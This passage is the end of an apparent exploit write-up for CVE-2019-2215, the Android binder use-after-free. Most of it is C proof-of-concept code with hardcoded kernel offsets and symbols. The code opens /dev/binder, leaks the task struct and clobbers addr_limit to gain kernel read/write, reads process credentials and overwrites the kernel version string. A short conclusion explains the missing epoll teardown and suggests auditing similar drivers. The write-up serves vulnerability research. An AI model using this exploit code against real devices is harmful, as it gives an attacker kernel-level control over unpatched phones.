unsigned long kernel_read_ulong(unsigned long kaddr) {
  unsigned long data;
  kernel_read(kaddr, &data, sizeof(data));
  return data;
}
void kernel_write_ulong(unsigned long kaddr, unsigned long data) {
  kernel_write(kaddr, &data, sizeof(data));
}
void kernel_write_uint(unsigned long kaddr, unsigned int data) {
  kernel_write(kaddr, &data, sizeof(data));
}

// Linux localhost 4.4.177-g83bee1dc48e8 #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 2019 aarch64
// data from `pahole` on my own build with the same .config
#define OFFSET__task_struct__mm 0x520
#define OFFSET__task_struct__cred 0x790
#define OFFSET__mm_struct__user_ns 0x300
#define OFFSET__uts_namespace__name__version 0xc7
// SYMBOL_* are relative to _head; data from /proc/kallsyms on userdebug
#define SYMBOL__init_user_ns 0x202f2c8
#define SYMBOL__init_task 0x20257d0
#define SYMBOL__init_uts_ns 0x20255c0

int main(void) {
  printf("Starting POC\n");
  //pin_to(0);

  dummy_page_4g_aligned = mmap((void*)0x100000000UL, 0x2000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
  if (dummy_page_4g_aligned != (void*)0x100000000UL)
    err(1, "mmap 4g aligned");
  if (pipe(kernel_rw_pipe)) err(1, "kernel_rw_pipe");

  binder_fd = open("/dev/binder", O_RDONLY);
  epfd = epoll_create(1000);
  leak_task_struct();
  clobber_addr_limit();

  setbuf(stdout, NULL);
  printf("should have stable kernel R/W now\n");

  /* in case you want to do stuff with the creds, to show that you can get them: */
  unsigned long current_mm = kernel_read_ulong(current_ptr + OFFSET__task_struct__mm);
  printf("current->mm == 0x%lx\n", current_mm);
  unsigned long current_user_ns = kernel_read_ulong(current_mm + OFFSET__mm_struct__user_ns);
  printf("current->mm->user_ns == 0x%lx\n", current_user_ns);
  unsigned long kernel_base = current_user_ns - SYMBOL__init_user_ns;
  printf("kernel base is 0x%lx\n", kernel_base);
  if (kernel_base & 0xfffUL) errx(1, "bad kernel base (not 0x...000)");
  unsigned long init_task = kernel_base + SYMBOL__init_task;
  printf("&init_task == 0x%lx\n", init_task);
  unsigned long init_task_cred = kernel_read_ulong(init_task + OFFSET__task_struct__cred);
  printf("init_task.cred == 0x%lx\n", init_task_cred);
  unsigned long my_cred = kernel_read_ulong(current_ptr + OFFSET__task_struct__cred);
  printf("current->cred == 0x%lx\n", my_cred);

  unsigned long init_uts_ns = kernel_base + SYMBOL__init_uts_ns;
  char new_uts_version[] = "EXPLOITED KERNEL";
  kernel_write(init_uts_ns + OFFSET__uts_namespace__name__version, new_uts_version, sizeof(new_uts_version));
}

3. Conclusion

The problem behind CVE-2019-2215 is that a kernel driver which exposes its functionality through a device file did not handle the epoll side of its teardown (removing any references it still has registered in epoll when it destroys its objects). The same idea can be extended to auditing other, similar driver modules: check whether they, too, fail to tear down their epoll references on destruction.

4. References